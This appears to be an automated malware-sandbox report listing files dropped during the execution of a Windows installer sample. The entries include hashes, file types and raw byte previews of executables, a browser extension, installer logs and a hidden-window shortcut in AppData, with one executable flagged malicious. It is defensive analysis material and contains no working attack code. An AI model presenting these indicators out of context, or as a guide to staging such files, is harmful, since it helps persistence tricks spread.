                                                                                                                                                                SSDEEP:98304:9dcsjAcC3kmUPeLv6p5DBkkIKBHB3D4CW0a+Tl3rRhNCMeN:HcxcC3YW769eKBSyV51C9
                                                                                                                                                                MD5:B8D52ACEC13C4F4EFEB44A769D6832F1
                                                                                                                                                                SHA1:FAC39ADBCDC92DA37989435E23BC5FE6B9A3B4D7
                                                                                                                                                                SHA-256:68E9DBF1BD3463875DD8ED005D781DBE830D34F0DC71622FB65E8C133FCEF2F4
                                                                                                                                                                SHA-512:A933583BC857A2655E7389350DD84C971F33930C53C32E5D17EA5726CDDC165799B4D29C750956D68DBDBE0BF8A09A9E54E6C5DA5AF98777C6C4513B124B727B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..U^...........7..;-.. ...::..'...5,...;......3,..'...5,..$^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^...0..=?...;..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^...,.. ;..'*..7;..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^.......{..==..'1..z.......9;..&5..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..zn..di..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\8e7d6d72-9219-43c7-937d-7659f3bef6d0.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\9bfd4df5-ccc2-4d99-9760-acc6889c9fa3.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):75044
                                                                                                                                                                Entropy (8bit):7.963079277535475
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:vZoDkDEgiC5dTUJtIevuLVwx5bF8JnMxnTBZjeaExdoz/M7tHLuj:vZssoC5dUpuLVw/B4MxnFZWMz/M7tHe
                                                                                                                                                                MD5:B9A848C1E51E617BAEAF2AFE76C6C264
                                                                                                                                                                SHA1:354199EB9F3A36D962D06E212E8C80D7277873B4
                                                                                                                                                                SHA-256:CD9C4AC0ECDBF3E63BBD524B37A69AF378BE8D41AC180FC0377F4DB05A336DF3
                                                                                                                                                                SHA-512:DA6B276BA4FE6AC0C2CB1E5B99D932EC63F57F82743B9854EB8DF358F6690FF7D07185B377C0EB0197E0806757F3612494840046996FEE66E683E8F9BEE8F992
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):2364728
                                                                                                                                                                Entropy (8bit):6.606009669324617
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                • Filename: cLm7ThwEvh.msi, Detection: malicious, Browse
                                                                                                                                                                • Filename: LVkAi4PBv6.exe, Detection: malicious, Browse
                                                                                                                                                                • Filename: w3245.exe, Detection: malicious, Browse
                                                                                                                                                                • Filename: w3245.exe, Detection: malicious, Browse
                                                                                                                                                                • Filename: 9mauyKC3JW.exe, Detection: malicious, Browse
                                                                                                                                                                • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                • Filename: upgrade.hta, Detection: malicious, Browse
                                                                                                                                                                • Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse
                                                                                                                                                                • Filename: UolJwovI8c.exe, Detection: malicious, Browse
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Rubrician_20250109084129.cleanroom.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):745
                                                                                                                                                                Entropy (8bit):5.468734318091139
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:kbe3uXNULLWUzMpbUbMSRcP2EmRKgbMSRcP2EWKhbMSRcP2rRKeZHFwzCrbD:k8YNwLLzCotcP2rtcP2ytcP2LZHWzof
                                                                                                                                                                MD5:997E4C602834F96C7B0E35EC673C44E5
                                                                                                                                                                SHA1:5BD3CC881CB5F5585B1DC8FE4E0B0439E40280CA
                                                                                                                                                                SHA-256:B65C347A8A85D1E454931854BC71F669FAA01146137132743D744CD7BBD8B58D
                                                                                                                                                                SHA-512:A7FB6E6CC1966816C4C85B12D56FFEE23C4AE6FDDD56A2A27DD7C224A8FFE40C515725B9B99E8B1A509A6D0D1AC24964A4418CADC904424B63E89A39F64C6217
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[1E2C:1E30][2025-01-09T08:41:29]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Users\user\Desktop\kXzODlqJak.exe..[1E2C:1E30][2025-01-09T08:41:29]i009: Command Line: ''..[1E2C:1E30][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1E2C:1E30][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1E2C:1E30][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user~1\AppData\Local\Temp\Rubrician_20250109084129.cleanroom.log'..[1E2C:1E30][2025-01-09T08:41:31]i017: Exit code: 0x0..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Rubrician_20250109084131.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1131
                                                                                                                                                                Entropy (8bit):5.52614210739312
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:EB8YNwLLzPgytB+wuBtcP2PBtcP22BMcP2LZHWXpBMcP2aBMcP2DBMcP2/1:EBLNubtBmBMWBMzBDOZsBDJBD6BDS1
                                                                                                                                                                MD5:631699B87AC06982E87F295C2727298D
                                                                                                                                                                SHA1:BE1CF7502E22840343F6ADF23AF9203E65FADB13
                                                                                                                                                                SHA-256:0BE52B05DAEFB6624A12847CC501F8F141C763B62ACC57A56245C20CE0F71669
                                                                                                                                                                SHA-512:EBF634235E90C20D7858F5F908BCF08901DCC59945EEBC0F1900D2BB8CF345942A52138E1C6FC48F0629D803A0C694D6C6C9B11CD3BD2A60BE5499D912CEC25B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[1E60:1E64][2025-01-09T08:41:29]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe..[1E60:1E64][2025-01-09T08:41:29]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\kXzODlqJak.exe -burn.filehandle.attached=648 -burn.filehandle.self=652'..[1E60:1E64][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1E60:1E64][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1E60:1E64][2025-01-09T08:41:31]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user~1\AppData\Local\Temp\Rubrician_20250109084131.log'..[1E60:1E64][2025-01-09T08:41:31]i000: Setting string variable 'WixBundleInProgressName' to value ''..[1E60:1E64][2025-01-09T08:41:31]i000: Setting string variable 'WixBundle

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\aa01dcab-fdff-4d87-90e3-26eb123341c2.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bfxggb

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 9 12:41:32 2025, mtime=Thu Jan 9 12:41:33 2025, atime=Fri Jan 3 18:13:10 2025, length=6487736, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1033
                                                                                                                                                                Entropy (8bit):4.968192360127806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:84Cur2X9+pocmPIiAHFYoX7zvMJTMJtm:8lur2XAotIBHFYwkJwJt
                                                                                                                                                                MD5:1E9A7D9E253D9C9496F62A1DC1830C19
                                                                                                                                                                SHA1:7A94D862A6AFFE6B2DFDA6FDF9BA9B203D16435B
                                                                                                                                                                SHA-256:55ED767F2198457929DE79887AEF583792853B6906CB82860AA9C0B6935DA1C8
                                                                                                                                                                SHA-512:0647B1E1BCFD87757CA71D541411E0D66E3BA8B6C1DBE7AB40C240296F328DF99164768C5446526FAF58F054AEFF79361C6CCD53FDF6940E9B2FD0B7ADBDC8F4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L..................F.... ...uW.1.b....%2.b.......^....b.......................:..DG..Yr?.D..U..k0.&...&......Qg.*_....#...b.....8.b......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=)Z$m..........................3*N.A.p.p.D.a.t.a...B.V.1.....)Z1m..Roaming.@......EW.=)Z2m..............................R.o.a.m.i.n.g.....t.1.....)Z1m..REMOTE~1..\......)Z1m)Z2m...........................)..R.e.m.o.t.e.s.e.r.v.i.c.e.z.o.o._.t.e.s.t.....r.2...b.#Z.. .RESCUE~1.EXE..V......)Z1m)Z1m..............................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......z...............-.......y............0t.....C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe..N.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.e.m.o.t.e.s.e.r.v.i.c.e.z.o.o._.t.e.s.t.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......376483...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h...

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                Entropy (8bit):5.395685258291011
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0Zth5G5QP0ZoL5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5H
                                                                                                                                                                MD5:7EC32E4964A6DCA5C7264DD89820B5BC
                                                                                                                                                                SHA1:527E5A8AEA34B5BD86D83F0B4A46F2A92529315F
                                                                                                                                                                SHA-256:D3D9F412C91EF44BADC8F6CD0AB847B500F025CF1294D9D6C3B172C7FE7868C3
                                                                                                                                                                SHA-512:2D8FDE8D6070F408AC00F57EE81C10ED462536EA6FFA5C6D1A676B215FF5A071065D93CC167ABDB4293BC8298DFAC0C163A0D90342814CB5B0AE374B4221A9D9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e79f0012-63ac-4395-877b-12fad8288e80.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):31335
                                                                                                                                                                Entropy (8bit):7.694019108205432
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\oeqwwe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2526208
                                                                                                                                                                Entropy (8bit):6.697179434185451
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
                                                                                                                                                                SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...H..W.................. ..p&.....W..........@..............................0.......&...`... ..............................................P0.......0.8.....%..t............0............................. .%.(...................hQ0..............................text..... ....... .................`..`.data......... ....... .............@....rdata........!.......!.............@..@.pdata...t....%..v....%.............@..@.xdata...W...@&..X....&.............@..@.bss..........&..........................idata.......P0......b&.............@....CRT....0....`0......h&.............@....tls.........p0......j&.............@....rsrc...8.....0......l&.............@..@.reloc........0......n&.............@..Bsfdel.... ....0......t&.............@...................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qpfwaekftwavc

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):2526208
                                                                                                                                                                Entropy (8bit):6.697179434185451
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
                                                                                                                                                                SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...H..W.................. ..p&.....W..........@..............................0.......&...`... ..............................................P0.......0.8.....%..t............0............................. .%.(...................hQ0..............................text..... ....... .................`..`.data......... ....... .............@....rdata........!.......!.............@..@.pdata...t....%..v....%.............@..@.xdata...W...@&..X....&.............@..@.bss..........&..........................idata.......P0......b&.............@....CRT....0....`0......h&.............@....tls.........p0......j&.............@....rsrc...8.....0......l&.............@..@.reloc........0......n&.............@..Bsfdel.... ....0......t&.............@...................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\8e7d6d72-9219-43c7-937d-7659f3bef6d0.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\128.png

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                Malicious:false
